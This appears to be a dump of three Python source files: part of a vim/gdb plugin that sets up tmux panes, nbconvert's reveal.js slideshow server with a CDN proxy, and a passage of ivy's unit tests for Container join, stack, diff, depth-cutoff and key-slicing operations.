    # First whitespace-separated token of gdbArgs is the binary being debugged.
    chunks = re.split(' +', self.gdbArgs)
    if chunks:
        self.debug_bin = chunks[0]
        self.logger.info(f"Gdb starting '{self.debug_bin}' with {chunks[1:]} ...")
    else:
        self.debug_bin = self.gdbArgs
        self.logger.info(f"Gdb starting '{self.debug_bin}' ...")
    # let s:dir = expand('<sfile>:p:h')
    # Ask vim which file is currently open; gdb needs a current file to anchor on.
    self.vim.command('let g:vimgdb_file = expand("%:p")')
    self.file = self.vim.eval('g:vimgdb_file')
    if len(self.file) < 1:
        self.vim.command('echomsg "Gdb start fail, no current file"')
        return
    # Query tmux for the session/window/pane hosting this vim instance.
    tmux_info = subprocess.check_output(
        ['tmux', 'display-message', '-p', '#S;#{session_id};#{window_width};#{window_height};#{window_index};#{pane_id}'])
    tmux_info = tmux_info.decode()
    [self.tmux_sesname, self.tmux_sesid, self.tmux_win_def_width, self.tmux_win_def_height, self.tmux_pwin_idx, self.tmux_curr_pan_id] = tmux_info.strip().split(';')
    # option controller: kill other pane of current tmux window
    subprocess.check_output(['tmux', 'kill-pane', '-a', '-t', self.tmux_curr_pan_id])
    self.logger.info(f"Tmux: #{self.tmux_sesid} '{self.tmux_sesname}' {self.tmux_win_def_width}x{self.tmux_win_def_height} cwd='{self.workdir}'")
    self.tmux_server = Server()
    self.tmux_session = self.tmux_server.get_by_id(self.tmux_sesid)
    self.build_workspace()
    self.vim.funcs.VimGdbInit()
    self._define_vimsigns()
    # Create model Cursor:
    _model = Cursor(self._common, self)
    if not _model:
        return
    self.models_coll[_model._name] = _model
    # Create model Breakpoint:
    _model = Breakpoint(self._common, self)
    if not _model:
        return
    self.models_coll[_model._name] = _model
    # Create view MainVimWin:
    _view = Win(self._common, self)
    if not _view:
        return
    self.views_coll[_view._name] = _view
    self.logger.info(f"VimGdb mode={self.gdbMode}", )
    # REMOTE mode also starts a local gdb front-end before attaching remotely.
    if self.gdbMode == GdbMode.LOCAL or self.gdbMode == GdbMode.REMOTE:
        self.create_gdb_local(args)
    if self.gdbMode == GdbMode.REMOTE:
        self.create_gdb_remote(args)
    ##self.tmux_window_vim.select_layout('main-horizontal')
    #self.tmux_window_vim.select_layout('main-vertical')
    # focus backto vim
    self.tmux_pane_vim.select_pane()
    # monitor all outfile
    if Common.tailModeSubprocess:
        self.logger.info("Start subprocess(tail -f) ...")
        # NOTE(review): daemon flag left disabled — this thread can keep the
        # process alive on exit; confirm intended.
        t1 = threading.Thread(target=self.tail_files)
        #t1.setDaemon(True)
        t1.start()
    return
|
serve.py | """PostProcessor for serving reveal.js HTML slideshows."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import os
import webbrowser
import threading
from tornado import web, ioloop, httpserver, log, gen
from tornado.httpclient import AsyncHTTPClient
from traitlets import Bool, Unicode, Int
from .base import PostProcessorBase
class ProxyHandler(web.RequestHandler):
    """Handler that proxies requests from a local prefix to a CDN."""

    @gen.coroutine
    def get(self, prefix, url):
        """Fetch *url* from the configured CDN and relay it to the client."""
        client = self.settings['client']
        target = "/".join([self.settings['cdn'], url])
        upstream = yield client.fetch(target)
        # Forward only the cache-relevant headers from the CDN response.
        for name in ["Content-Type", "Cache-Control", "Date", "Last-Modified", "Expires"]:
            if name in upstream.headers:
                self.set_header(name, upstream.headers[name])
        self.finish(upstream.body)
class ServePostProcessor(PostProcessorBase):
    """Post processor designed to serve files

    Proxies reveal.js requests to a CDN if no local reveal.js is present
    """

    # Launch a web browser pointed at the slides once the server is listening.
    open_in_browser = Bool(True,
        help="""Should the browser be opened automatically?"""
    ).tag(config=True)

    browser = Unicode(u'',
        help="""Specify what browser should be used to open slides. See
        https://docs.python.org/3/library/webbrowser.html#webbrowser.register
        to see how keys are mapped to browser executables. If
        not specified, the default browser will be determined
        by the `webbrowser`
        standard library module, which allows setting of the BROWSER
        environment variable to override it.
        """).tag(config=True)

    # CDN fallback used when no local reveal.js directory is found.
    reveal_cdn = Unicode("https://cdnjs.cloudflare.com/ajax/libs/reveal.js/3.5.0",
        help="""URL for reveal.js CDN.""").tag(config=True)

    reveal_prefix = Unicode("reveal.js",
        help="URL prefix for reveal.js").tag(config=True)

    ip = Unicode("127.0.0.1",
        help="The IP address to listen on.").tag(config=True)

    port = Int(8000, help="port for the server to listen on.").tag(config=True)

    def postprocess(self, input):
        """Serve the build directory with a webserver."""
        dirname, filename = os.path.split(input)
        # Static files from the build dir; "/" redirects to the slideshow file.
        handlers = [
            (r"/(.+)", web.StaticFileHandler, {'path' : dirname}),
            (r"/", web.RedirectHandler, {"url": "/%s" % filename})
        ]
        if ('://' in self.reveal_prefix or self.reveal_prefix.startswith("//")):
            # reveal specifically from CDN, nothing to do
            pass
        elif os.path.isdir(os.path.join(dirname, self.reveal_prefix)):
            # reveal prefix exists
            self.log.info("Serving local %s", self.reveal_prefix)
        else:
            # No local copy: proxy /<prefix>/* requests through to the CDN.
            self.log.info("Redirecting %s requests to %s", self.reveal_prefix, self.reveal_cdn)
            handlers.insert(0, (r"/(%s)/(.*)" % self.reveal_prefix, ProxyHandler))
        app = web.Application(handlers,
            cdn=self.reveal_cdn,
            client=AsyncHTTPClient(),
        )
        # hook up tornado logging to our logger
        log.app_log = self.log
        http_server = httpserver.HTTPServer(app)
        http_server.listen(self.port, address=self.ip)
        url = "http://%s:%i/%s" % (self.ip, self.port, filename)
        print("Serving your slides at %s" % url)
        print("Use Control-C to stop this server")
        if self.open_in_browser:
            try:
                browser = webbrowser.get(self.browser or None)
                # Open in a background thread so the IOLoop can start serving first.
                b = lambda: browser.open(url, new=2)
                threading.Thread(target=b).start()
            except webbrowser.Error as e:
                self.log.warning('No web browser found: %s.' % e)
                browser = None  # NOTE(review): assigned but never read afterwards
        try:
            # Blocks until interrupted.
            ioloop.IOLoop.instance().start()
        except KeyboardInterrupt:
            print("\nInterrupted")
def main(path):
    """allow running this module to serve the slides"""
    postprocessor = ServePostProcessor()
    postprocessor(path)
if __name__ == '__main__':
    import sys
    # Serve the slideshow file given as the first CLI argument.
    main(sys.argv[1])
|
test_container.py | # global
import os
import queue
import pytest
import random
import numpy as np
import multiprocessing
import pickle
# local
import ivy
from ivy.container import Container
import ivy_tests.test_ivy.helpers as helpers
def test_container_list_join(device, call):
    """Container.list_join joins per-leaf lists element-wise across containers."""
    cont_first = Container(
        {
            "a": [ivy.array([1], device=device)],
            "b": {
                "c": [ivy.array([2], device=device)],
                "d": [ivy.array([3], device=device)],
            },
        }
    )
    cont_second = Container(
        {
            "a": [ivy.array([4], device=device)],
            "b": {
                "c": [ivy.array([5], device=device)],
                "d": [ivy.array([6], device=device)],
            },
        }
    )
    joined = ivy.Container.list_join([cont_first, cont_second])
    # Entry idx of each joined list comes from container idx; check both
    # item access and attribute access forms.
    for idx, (exp_a, exp_c, exp_d) in enumerate([(1, 2, 3), (4, 5, 6)]):
        assert np.allclose(ivy.to_numpy(joined["a"][idx]), np.array([exp_a]))
        assert np.allclose(ivy.to_numpy(joined.a[idx]), np.array([exp_a]))
        assert np.allclose(ivy.to_numpy(joined["b"]["c"][idx]), np.array([exp_c]))
        assert np.allclose(ivy.to_numpy(joined.b.c[idx]), np.array([exp_c]))
        assert np.allclose(ivy.to_numpy(joined["b"]["d"][idx]), np.array([exp_d]))
        assert np.allclose(ivy.to_numpy(joined.b.d[idx]), np.array([exp_d]))
def test_container_list_stack(device, call):
    """Container.list_stack stacks per-key leaves along the given axis."""
    cont_first = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont_second = Container(
        {
            "a": ivy.array([4], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    stacked = ivy.Container.list_stack([cont_first, cont_second], 0)
    # Row idx of each stacked leaf comes from container idx; check both
    # item access and attribute access forms.
    for idx, (exp_a, exp_c, exp_d) in enumerate([(1, 2, 3), (4, 5, 6)]):
        assert np.allclose(ivy.to_numpy(stacked["a"][idx]), np.array([exp_a]))
        assert np.allclose(ivy.to_numpy(stacked.a[idx]), np.array([exp_a]))
        assert np.allclose(ivy.to_numpy(stacked["b"]["c"][idx]), np.array([exp_c]))
        assert np.allclose(ivy.to_numpy(stacked.b.c[idx]), np.array([exp_c]))
        assert np.allclose(ivy.to_numpy(stacked["b"]["d"][idx]), np.array([exp_d]))
        assert np.allclose(ivy.to_numpy(stacked.b.d[idx]), np.array([exp_d]))
def test_container_unify(device, call):
    """Container.unify gathers per-device containers onto one device by
    concatenation; the multi-device path only runs with >1 GPU available."""
    # devices and containers
    devices = list()
    dev0 = device
    devices.append(dev0)
    conts = dict()
    conts[dev0] = Container(
        {
            "a": ivy.array([1], device=dev0),
            "b": {"c": ivy.array([2], device=dev0), "d": ivy.array([3], device=dev0)},
        }
    )
    # Add a second container on the last GPU when more than one is present.
    if "gpu" in device and ivy.num_gpus() > 1:
        idx = ivy.num_gpus() - 1
        dev1 = device[:-1] + str(idx)
        devices.append(dev1)
        conts[dev1] = Container(
            {
                "a": ivy.array([4], device=dev1),
                "b": {
                    "c": ivy.array([5], device=dev1),
                    "d": ivy.array([6], device=dev1),
                },
            }
        )
    # test
    container_unified = ivy.Container.unify(ivy.MultiDevItem(conts), dev0, "concat", 0)
    assert np.allclose(ivy.to_numpy(container_unified.a[0]), np.array([1]))
    assert np.allclose(ivy.to_numpy(container_unified.b.c[0]), np.array([2]))
    assert np.allclose(ivy.to_numpy(container_unified.b.d[0]), np.array([3]))
    # Second device's values only exist when the GPU branch above ran.
    if len(devices) > 1:
        assert np.allclose(ivy.to_numpy(container_unified.a[1]), np.array([4]))
        assert np.allclose(ivy.to_numpy(container_unified.b.c[1]), np.array([5]))
        assert np.allclose(ivy.to_numpy(container_unified.b.d[1]), np.array([6]))
def test_container_concat(device, call):
    """ivy.concat applied to containers concatenates each leaf pair."""
    cont_first = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont_second = Container(
        {
            "a": ivy.array([4], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    result = ivy.concat([cont_first, cont_second], 0)
    # Check item access and attribute access against the same expectations.
    expectations = [
        (result["a"], [1, 4]),
        (result.a, [1, 4]),
        (result["b"]["c"], [2, 5]),
        (result.b.c, [2, 5]),
        (result["b"]["d"], [3, 6]),
        (result.b.d, [3, 6]),
    ]
    for leaf, expected in expectations:
        assert np.allclose(ivy.to_numpy(leaf), np.array(expected))
def test_container_stack(device, call):
    """Container.stack adds a new leading axis when combining leaf arrays."""
    cont_first = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont_second = Container(
        {
            "a": ivy.array([4], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    result = ivy.Container.stack([cont_first, cont_second], 0)
    # Check item access and attribute access against the same expectations.
    expectations = [
        (result["a"], [[1], [4]]),
        (result.a, [[1], [4]]),
        (result["b"]["c"], [[2], [5]]),
        (result.b.c, [[2], [5]]),
        (result["b"]["d"], [[3], [6]]),
        (result.b.d, [[3], [6]]),
    ]
    for leaf, expected in expectations:
        assert np.allclose(ivy.to_numpy(leaf), np.array(expected))
def test_container_combine(device, call):
    """Container.combine keeps the union of keys; the second container wins
    on shared keys."""
    cont_first = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont_second = Container(
        {
            "a": ivy.array([4], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "e": ivy.array([6], device=device),
            },
        }
    )
    combined = ivy.Container.combine(cont_first, cont_second)
    # a and b.c are overridden by the second container; b.d and b.e are
    # each present in only one input and survive untouched.
    for leaf, expected in (
        (combined.a, 4),
        (combined.b.c, 5),
        (combined.b.d, 3),
        (combined.b.e, 6),
    ):
        assert np.equal(ivy.to_numpy(leaf), np.array([expected]))
def test_container_diff(device, call):
    """Container.diff on value differences, key differences and strings,
    including the "diff_only" and "same_only" filter modes."""
    # all different arrays
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "a": ivy.array([4], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    container_diff = ivy.Container.diff(container_0, container_1)
    # Every leaf differs, so each key splits into diff_0/diff_1 sub-keys.
    assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([4]))
    assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
    assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
    assert np.equal(ivy.to_numpy(container_diff.b.d.diff_1), np.array([6]))
    container_diff_diff_only = ivy.Container.diff(
        container_0, container_1, mode="diff_only"
    )
    assert container_diff_diff_only.to_dict() == container_diff.to_dict()
    container_diff_same_only = ivy.Container.diff(
        container_0, container_1, mode="same_only"
    )
    assert container_diff_same_only.to_dict() == {}
    # some different arrays
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_diff = ivy.Container.diff(container_0, container_1)
    # Equal leaves stay flat; only b.c gains diff_0/diff_1.
    assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
    assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
    container_diff_diff_only = ivy.Container.diff(
        container_0, container_1, mode="diff_only"
    )
    assert "a" not in container_diff_diff_only
    assert "b" in container_diff_diff_only
    assert "c" in container_diff_diff_only["b"]
    assert "d" not in container_diff_diff_only["b"]
    container_diff_same_only = ivy.Container.diff(
        container_0, container_1, mode="same_only"
    )
    assert "a" in container_diff_same_only
    assert "b" in container_diff_same_only
    assert "c" not in container_diff_same_only["b"]
    assert "d" in container_diff_same_only["b"]
    # all different keys
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "e": ivy.array([1], device=device),
            "f": {
                "g": ivy.array([2], device=device),
                "h": ivy.array([3], device=device),
            },
        }
    )
    container_diff = ivy.Container.diff(container_0, container_1)
    # Keys only in container_0 nest under diff_0; only in container_1 under diff_1.
    assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
    assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([3]))
    container_diff_diff_only = ivy.Container.diff(
        container_0, container_1, mode="diff_only"
    )
    assert container_diff_diff_only.to_dict() == container_diff.to_dict()
    container_diff_same_only = ivy.Container.diff(
        container_0, container_1, mode="same_only"
    )
    assert container_diff_same_only.to_dict() == {}
    # some different keys
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "e": ivy.array([3], device=device),
            },
        }
    )
    container_diff = ivy.Container.diff(container_0, container_1)
    assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
    assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
    container_diff_diff_only = ivy.Container.diff(
        container_0, container_1, mode="diff_only"
    )
    assert "a" not in container_diff_diff_only
    assert "b" in container_diff_diff_only
    assert "c" not in container_diff_diff_only["b"]
    assert "d" in container_diff_diff_only["b"]
    assert "e" in container_diff_diff_only["b"]
    container_diff_same_only = ivy.Container.diff(
        container_0, container_1, mode="same_only"
    )
    assert "a" in container_diff_same_only
    assert "b" in container_diff_same_only
    assert "c" in container_diff_same_only["b"]
    assert "d" not in container_diff_same_only["b"]
    assert "e" not in container_diff_same_only["b"]
    # same containers
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_diff = ivy.Container.diff(container_0, container_1)
    # Identical containers: diff is flat, diff_only empty, same_only is the diff.
    assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
    container_diff_diff_only = ivy.Container.diff(
        container_0, container_1, mode="diff_only"
    )
    assert container_diff_diff_only.to_dict() == {}
    container_diff_same_only = ivy.Container.diff(
        container_0, container_1, mode="same_only"
    )
    assert container_diff_same_only.to_dict() == container_diff.to_dict()
    # all different strings
    container_0 = Container({"a": "1", "b": {"c": "2", "d": "3"}})
    container_1 = Container({"a": "4", "b": {"c": "5", "d": "6"}})
    container_diff = ivy.Container.diff(container_0, container_1)
    assert container_diff.a.diff_0 == "1"
    assert container_diff.a.diff_1 == "4"
    assert container_diff.b.c.diff_0 == "2"
    assert container_diff.b.c.diff_1 == "5"
    assert container_diff.b.d.diff_0 == "3"
    assert container_diff.b.d.diff_1 == "6"
    container_diff_diff_only = ivy.Container.diff(
        container_0, container_1, mode="diff_only"
    )
    assert container_diff_diff_only.to_dict() == container_diff.to_dict()
    container_diff_same_only = ivy.Container.diff(
        container_0, container_1, mode="same_only"
    )
    assert container_diff_same_only.to_dict() == {}
def test_container_structural_diff(device, call):
    """Container.structural_diff compares keys and array shapes only —
    equal-shaped leaves count as "same" even when values differ."""
    # all different keys or shapes
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "a": ivy.array([[4]], device=device),
            "b": {
                "c": ivy.array([[[5]]], device=device),
                "e": ivy.array([3], device=device),
            },
        }
    )
    container_diff = ivy.Container.structural_diff(container_0, container_1)
    # Shape mismatches and unshared keys split into diff_0/diff_1 sub-keys.
    assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([[4]]))
    assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([[[5]]]))
    assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
    assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
    container_diff_diff_only = ivy.Container.structural_diff(
        container_0, container_1, mode="diff_only"
    )
    assert container_diff_diff_only.to_dict() == container_diff.to_dict()
    container_diff_same_only = ivy.Container.structural_diff(
        container_0, container_1, mode="same_only"
    )
    assert container_diff_same_only.to_dict() == {}
    # some different shapes
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "a": ivy.array([4], device=device),
            "b": {
                "c": ivy.array([[5]], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    container_diff = ivy.Container.structural_diff(container_0, container_1)
    # Only b.c has a shape mismatch; the other leaves are structurally same.
    assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
    assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
    container_diff_diff_only = ivy.Container.structural_diff(
        container_0, container_1, mode="diff_only"
    )
    assert "a" not in container_diff_diff_only
    assert "b" in container_diff_diff_only
    assert "c" in container_diff_diff_only["b"]
    assert "d" not in container_diff_diff_only["b"]
    container_diff_same_only = ivy.Container.structural_diff(
        container_0, container_1, mode="same_only"
    )
    assert "a" in container_diff_same_only
    assert "b" in container_diff_same_only
    assert "c" not in container_diff_same_only["b"]
    assert "d" in container_diff_same_only["b"]
    # all different keys
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "e": ivy.array([4], device=device),
            "f": {
                "g": ivy.array([5], device=device),
                "h": ivy.array([6], device=device),
            },
        }
    )
    container_diff = ivy.Container.structural_diff(container_0, container_1)
    assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
    assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([4]))
    assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([5]))
    assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([6]))
    container_diff_diff_only = ivy.Container.structural_diff(
        container_0, container_1, mode="diff_only"
    )
    assert container_diff_diff_only.to_dict() == container_diff.to_dict()
    container_diff_same_only = ivy.Container.structural_diff(
        container_0, container_1, mode="same_only"
    )
    assert container_diff_same_only.to_dict() == {}
    # some different keys
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "a": ivy.array([4], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "e": ivy.array([6], device=device),
            },
        }
    )
    container_diff = ivy.Container.structural_diff(container_0, container_1)
    assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
    assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([6]))
    container_diff_diff_only = ivy.Container.structural_diff(
        container_0, container_1, mode="diff_only"
    )
    assert "a" not in container_diff_diff_only
    assert "b" in container_diff_diff_only
    assert "c" not in container_diff_diff_only["b"]
    assert "d" in container_diff_diff_only["b"]
    assert "e" in container_diff_diff_only["b"]
    container_diff_same_only = ivy.Container.structural_diff(
        container_0, container_1, mode="same_only"
    )
    assert "a" in container_diff_same_only
    assert "b" in container_diff_same_only
    assert "c" in container_diff_same_only["b"]
    assert "d" not in container_diff_same_only["b"]
    assert "e" not in container_diff_same_only["b"]
    # all same
    container_0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container_1 = Container(
        {
            "a": ivy.array([4], device=device),
            "b": {
                "c": ivy.array([5], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    container_diff = ivy.Container.structural_diff(container_0, container_1)
    # Same keys and shapes throughout: structurally identical despite values.
    assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
    assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
    assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
    container_diff_diff_only = ivy.Container.structural_diff(
        container_0, container_1, mode="diff_only"
    )
    assert container_diff_diff_only.to_dict() == {}
    container_diff_same_only = ivy.Container.structural_diff(
        container_0, container_1, mode="same_only"
    )
    assert container_diff_same_only.to_dict() == container_diff.to_dict()
def test_container_from_dict(device, call):
    """A Container built from a nested dict exposes every leaf via both
    item access and attribute access."""
    source = {
        "a": ivy.array([1], device=device),
        "b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
    }
    cont = Container(source)
    for leaf, expected in (
        (cont["a"], 1),
        (cont.a, 1),
        (cont["b"]["c"], 2),
        (cont.b.c, 2),
        (cont["b"]["d"], 3),
        (cont.b.d, 3),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([expected]))
def test_container_depth(device, call):
    """Container.max_depth reports the deepest level of key nesting."""

    def arr(value):
        # Small helper: one-element array on the test device.
        return ivy.array([value], device=device)

    assert Container({"a": arr(1), "b": arr(2)}).max_depth == 1
    assert (
        Container({"a": arr(1), "b": {"c": arr(2), "d": arr(3)}}).max_depth == 2
    )
    assert (
        Container(
            {"a": arr(1), "b": {"c": {"d": arr(2)}, "e": arr(3)}}
        ).max_depth
        == 3
    )
    assert (
        Container({"a": arr(1), "b": {"c": {"d": {"e": arr(2)}}}}).max_depth == 4
    )
@pytest.mark.parametrize("inplace", [True, False])
def test_container_cutoff_at_depth(inplace, device, call):
    """cutoff_at_depth truncates the tree below the given depth (counted
    from the root); with inplace=True the original container is mutated."""
    # values
    a_val = ivy.array([1], device=device)
    bcde_val = ivy.array([2], device=device)
    # depth 1
    cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
    cont_cutoff = cont.cutoff_at_depth(1, inplace=inplace)
    # In-place mode mutates cont itself, so inspect that object instead.
    if inplace:
        cont_cutoff = cont
    assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
    assert not cont_cutoff.b
    # depth 2
    cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
    cont_cutoff = cont.cutoff_at_depth(2, inplace=inplace)
    if inplace:
        cont_cutoff = cont
    assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
    assert not cont_cutoff.b.c
    # depth 3
    cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
    cont_cutoff = cont.cutoff_at_depth(3, inplace=inplace)
    if inplace:
        cont_cutoff = cont
    assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
    assert not cont_cutoff.b.c.d
    # depth 4
    cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
    cont_cutoff = cont.cutoff_at_depth(4, inplace=inplace)
    if inplace:
        cont_cutoff = cont
    # Depth equals the tree's full depth: nothing is pruned.
    assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
    assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(bcde_val))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_cutoff_at_height(inplace, device, call):
    """cutoff_at_height prunes branches measured upward from the leaves;
    with inplace=True the original container is mutated."""
    # values
    d_val = ivy.array([2], device=device)
    e_val = ivy.array([3], device=device)
    # height 0
    cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
    cont_cutoff = cont.cutoff_at_height(0, inplace=inplace)
    # In-place mode mutates cont itself, so inspect that object instead.
    if inplace:
        cont_cutoff = cont
    # Height 0 prunes nothing.
    assert np.allclose(ivy.to_numpy(cont_cutoff.a.c.d), ivy.to_numpy(d_val))
    assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(e_val))
    # height 1
    cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
    cont_cutoff = cont.cutoff_at_height(1, inplace=inplace)
    if inplace:
        cont_cutoff = cont
    assert not cont_cutoff.a.c
    assert not cont_cutoff.b.c.d
    # height 2
    cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
    cont_cutoff = cont.cutoff_at_height(2, inplace=inplace)
    if inplace:
        cont_cutoff = cont
    assert not cont_cutoff.a
    assert not cont_cutoff.b.c
    # height 3
    cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
    cont_cutoff = cont.cutoff_at_height(3, inplace=inplace)
    if inplace:
        cont_cutoff = cont
    assert not cont_cutoff.a
    assert not cont_cutoff.b
    # height 4
    cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
    cont_cutoff = cont.cutoff_at_height(4, inplace=inplace)
    if inplace:
        cont_cutoff = cont
    # Height beyond the tree: everything is pruned.
    assert not cont_cutoff
@pytest.mark.parametrize("str_slice", [True, False])
def test_container_slice_keys(str_slice, device, call):
    """slice_keys keeps only keys inside the slice — either at selected
    depths (dict argument) or at every depth (all_depths=True). Both the
    string form "b:d" and an equivalent slice object are exercised."""
    # values
    a_val = ivy.array([1], device=device)
    b_val = ivy.array([2], device=device)
    c_val = ivy.array([3], device=device)
    d_val = ivy.array([4], device=device)
    e_val = ivy.array([5], device=device)
    # slice
    if str_slice:
        slc = "b:d"
    else:
        slc = slice(1, 4, 1)
    # without dict
    cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
    cont_sliced = cont.slice_keys(slc)
